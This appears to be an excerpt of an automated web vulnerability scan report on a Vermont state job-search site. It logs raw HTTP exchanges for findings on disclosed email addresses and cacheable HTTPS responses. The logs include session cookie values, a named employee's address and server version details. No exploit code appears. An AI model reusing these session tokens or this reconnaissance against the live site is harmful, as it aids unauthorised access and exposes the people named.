location: /ada/mn_warninfo_dsp.cfm
Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/employeroverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/joboverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email addresses were disclosed in the response:
joseph.lucia@state.vt.us
vjl@state.vt.us
Request
GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]... <a href="mailto:vjl@state.vt.us">vjl@state.vt.us</a> ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:07:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
8. Cacheable HTTPS response
There are 22 instances of this issue:
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: 